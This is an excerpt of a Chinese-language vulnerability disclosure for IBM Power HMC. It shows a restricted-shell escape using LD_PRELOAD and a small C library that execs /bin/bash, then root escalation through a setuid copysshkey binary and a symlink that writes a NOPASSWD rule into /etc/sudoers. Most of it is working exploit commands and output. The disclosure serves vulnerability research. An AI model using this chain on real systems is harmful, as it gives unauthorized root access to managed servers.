IBM Power HMC漏洞披露：受限Shell突破与权限提升

然而，研究人员发现可以设置环境变量LD_PRELOAD，这使得他们能够运行任意二进制文件，而无需在命令中使用斜杠。

研究人员使用了一个简单的程序，该程序在应用程序退出时加载/bin/bash，如下所示：

#include<stdio.h>#include<unistd.h>voidexit(int e){    execve("/bin/bash", NULL, NULL);while(1);}

由于用户无法接收通过scp发送的文件，我们使用以下命令将库存储在系统上：

cat test.so | ssh ibmifcb@XXXXX cp /dev/stdin test.so

以下摘录展示了如何使用LD_PRELOAD进行利用以及在不受限的bash中进行操作：

ibmifcb@XXXXX:~> idbash: id: command not foundibmifcb@XXXXX:~> cd /bash: cd: restrictedibmifcb@XXXXX:~> LD_PRELOAD=./test.so lessMissing filename ("less --help"forhelp)[ibmifcb@XXXXX ibmifcb] $ cd /[ibmifcb@XXXXX /] $ pwd/

[ibmifcb@XXXXX /] $ ls -al /opt/hsc/bin/copysshkey-rwsr-xr-x 1 root root 81248 Oct 26  2023 /opt/hsc/bin/copysshkey

/opt/hsc/bin/copysshkey -o add -u hscroot -k 'ssh - ed25519 [...]'

[ibmifcb@XXXXX ibmifcb] $ pwd/home/ibmifcb[ibmifcb@XXXXX ibmifcb] $ mkdir -p lol/.ssh[ibmifcb@XXXXX ibmifcb] $ ln -s /etc/sudoers lol/.ssh/authorized_keys2[ibmifcb@XXXXX ibmifcb] $ /opt/hsc/bin/copysshkey -o add -u ibmifcb/lol -k 'ibmifcb ALL=(ALL) NOPASSWD: ALL'[ibmifcb@XXXXX ibmifcb] $ sudo -i[root@XXXXX ~] # cat /etc/sudoers[...]Defaults:ccfw   !requirettyccfw ALL=(ALL) NOPASSWD: ALLDefaults:root   !requirettyibmifcb ALL=(ALL) NOPASSWD: ALL